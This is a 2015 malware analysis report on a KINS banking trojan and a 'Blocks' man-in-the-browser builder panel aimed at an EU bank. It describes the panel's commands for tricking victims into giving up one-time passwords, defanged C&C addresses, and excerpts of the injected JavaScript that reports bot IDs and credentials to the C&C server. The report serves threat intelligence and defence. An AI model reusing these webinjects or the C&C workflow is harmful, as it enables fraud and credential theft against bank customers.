revealing unique mitb builder c&c server

Revealing Unique MitB Builder C&C Server 1

Revealing Unique MitB Builder

C&C Server

Short Technical Analyses for Intel and Awareness

Senad Aruc & Davide Cioccia

March 2015

(1) https://www.linkedin.com/pulse/20141117183957-26232854-kins-origin-malware-with-unique-atsengine-cc-server?trk=prof-post

(2) http://en.wikipedia.org/wiki/Man-in-the-browser

INTRODUCTION In the past we managed to analyse all well knows malwares and theirs C&C servers. We

saw a “Kins” malware with unique “ATS” engine acting like real electronic web banking

application in auto pilot mode (1). We all know how easy is to go underground and to

buy a malware kits with MitB (2) add-ons for well-known electronic banking web

applications and also to order a custom one. These injectors are main weapon used from

bad guys for the electronic banking application where 2-factor authentication “Tokens” is

implemented.

Man in the Browser Attack (2)



Bypassing the 2 factor authentication (3)

ATTACK We got an exclusive right to analyse this malware sample who is targeting a large

finance institution located in EU. The attack is targeted attack with three main

components.

• Malware “KINS”

o Version: 2.0

o First seen: 14.02.2015

o MD5: babc53295da4cd953a1cae1e33de4910

• C&C “Zeus”

o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg à Config

o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php à Gate

o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe à Malware

• MitB C&C “Blocks”

o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=

o Base64 decoded: hxxs://hidden.com:443/s/g.php à Gate

o hxxx://hidden.com:443/s/manual.php à Russian Manual for Blocks

o hxxx://hidden.com:443/s/center.php à C&C Server for Blocks MitB



INSIDE MITB C&C BLOCKS This unique MitB builder is design to help even an unexperienced Hacker to build a MitB

attacks just by adding and configuring blocks for every single function and step.

Using this method the hacker can interact with the victim’s action in hidden way pushing

injected commands inside the browser and hiding them by manipulating CSS, HTML and

JavaScript.

C&C Blocks MitB Server Login Page



The home page of the C&C server is divided into 3 sections.

1. In this section we can see the attack campaign details for each bank.

2. The second section is for online victims-bots

3. The last section is for offline victims-bots

MitB Server Welcome Page



The edit function located into first section is for building a MitB for the victims of that

specific bank-group. Here we can see the blocks for building the perfect MitB attack.

MitB Group Builder

The command list for every block is described in this dropdown list.

• Go – Is allowing the victim to reach the e-banking web application

• Question – Building a custom questionaries’ for the victims

• Error Question – Asking a questing with error output

• Tan – Java-Script function

• Error Tan - Java-Script function

• Hold – This is the function when victim click the button for transaction.

• Error Login – To trick victim that the login details are not correct.

• Kick – to kick the victim from e-banking application

• Confirm – Building a fake confirm messages

• Page – To forward the victim on different page.



Drop-Down List Commands

Another function of this MitB builder is custom injections for every single victim-bot.

Here we can see the inject functions that attacker can build for a specific victim-bot. The

username and the OTP password for every single command can be seen from the info

marked in red box.

The attackers can configure the following inject functions.

• Button Text

• Command

• Parameter 1

• Parameter 3

• Style



Specific Injections per Victim

The attack is alive and the amount of the new victims is 5-10 per day.

List of the victims



The only manual that we managed to discover is a short description about this MitB.

English Translation:

Manual for this MitB builder

Leadership 1.Statistic: Each bank prisvaevaetsya initial value of whether to skip authentication at the entrance hold - delay on user param1 seconds, Param2 param3 not uchityvayutsya - If the operator of the admin is not online then the user will be skipped. go - to pass user parameters are not uchityvayutsya 2.Last results: For multi-query info_send_1 - Zapraschivaemaya information was sent info_send_2 - Information of the second page has been sent For single-query

info_send - infa sent



INJECTIONS During our analysis, we detect the configuration file used by KINS malware to steal

sensible information from end users. The injected script present a default configuration

of financial malware, using a webinject entry with different fields:

• Entry: Type of injection performed by the malware

• Target: The real target. An online banking portal.

• Flags: HTTP methods that malware need to intercept to change the HTML code

inside the HTTP response. We found two flags inside the configuration file :

o P - used to intercept an HTTP POST request

o G - used to intercept an HTTP GET request

• data_before_inject: the right point where the webinject is installed

• data_end: the last point after the injection.

• data_inject: the real JavaScript injection

As we can see through the configuration file, the first operation made by the malware is

to hide the total content of the HTML body, with the following operation:

1. jQuery('body').hide();

After that, the user is blocked for a short period, until the malware receive instructions

from the C&C server. Here, in this snippet code, we can see the command shared

between client and server:

1. function checkReturnCommand() 2. { 3. var req = "send=2&u_bot_id=" +bot_id+"&bn=euHypo&u_login=&u_pass

=&log=cbf_check_command"; 4. function check_command() 5. { 6. if ( do2[0] =='go') 7. { 8. logMessages( 'let user go' , 'go', '','' ); 9. } 10. else if( do2[0] =='errorlogin') 11. { 12. logMessages( 'Show Error Login or Tan Message to Holder'

, do2[0] , do2[1],do2[2] ); 13. clearInterval(checkInterval); 14. } 15. else if( do2[0] == 'question') 16. { 17. logMessages( 'Show Question['+do2[1]+']' , do2[0] , do2[1

],do2[2] ); 18. clearInterval(checkInterval); 19. } 20. }



21. sendScriptRequest(sa, req,check_command, ["test123"]); 22. }

This function is a call back from the server to check the user status. If the C&C answer

with a go command, the malware stop the execution and the user can navigate the

website, going to the next webpage. The 'errorlogin' command can show an error or a

TAN request on the user browser to steal the dynamic part of credentials. The 'question'

command can ask the secret question and answer panel, to steal the information to

recovery a lost password.

Another function has different command to perform different actions

1. function statusCall() 2. { 3. if( ret_val == '0') 4. { 5. if (( do2[0] == 'go') || ( do2[0] == 'go_inactive')) 6. { 7. logMessages( 'let user go' , 'go', '','' ); 8. } 9. else if( ( do2[0] == 'hold' ) || ( do2[0] == 'tan' ) ) 10. { 11. logMessages('Hold after login,show first throbber for '+sT

imer+' Sec','throb','',''); 12. return false; 13. } 14. } 15. else if( ret_val =='block') 16. { 17. logMessages('Show block fake','block','',''); 18. return false; 19. } 20. } 21. sendScriptRequest(sa, req,statusCall, ["test123"]);

Here we have, 'hold', 'tan' and 'block' commands to hold informations, show the TAN

authentication panel and block the user with a fake message.

CONCLUSION A normal antivirus cannot detect this kind of advanced malware. Once the

malware infect a machine, it can change his behaviour and code continuously to

avoid a signature-based detection. This new MitB builder, also, is changing the

way that the MitB injector is built and sold in black markets. Using this builder

every normal user can build an own inject for MitB and target different banks

with no time. A new injection, or a complete malware can be bought from



forums and markets in the dark web for few Bitcoins or hundred dollars. A

complete solution provide the C&C panel (dropzone), the malware, the injection,

a spam campaign and, if needed, a malicious mobile application to steal

sensitive data like OTP.

To protect end users from that risk, financial institutes have to choose different

solutions that can detect different behaviour in the webpage and in the user

experience. The possibility to make a custom web injects for every single action

is making this attack different for each bank. Signature based detection, can be

avoided obfuscating the code with different techniques and methodologies, but

there are different solutions to raise an alert when the integrity of the webpage

is compromised. Solutions named Active Fraud Prevention can analyse

dynamically the HTML resources and fingerprint users to avoid different

connections in a short time from different country (“Session Stealing”).

ABOUT Senad Aruch

Multiple Certified ISMS Professional with

10-year background in: IT Security, IDS

and IPS, SIEM, SOC, Network Forensics,

Malware Analyses, ISMS and RISK, Ethical

Hacking, Vulnerability Management, Anti

Fraud and Cyber Security. Currently

holding a Senior Lead position.

E-Mail: [email protected]

Blog: www.senadaruc.com

Twitter: senadaruch

linkedin.com/in/senadaruc

Davide Cioccia

MSc Computer Engineering Degree.

Security Developer focused on

Cyber Security Intelligence,

Malware analysis, Anti-fraud

systems. Microsoft certified.

Currently holding a Security

Consultant position.

E-Mail: [email protected]

Twitter: david107

LinkedIn:linkedin.com/in/david

ecioccia

revealing unique mitb builder c&c server

Technology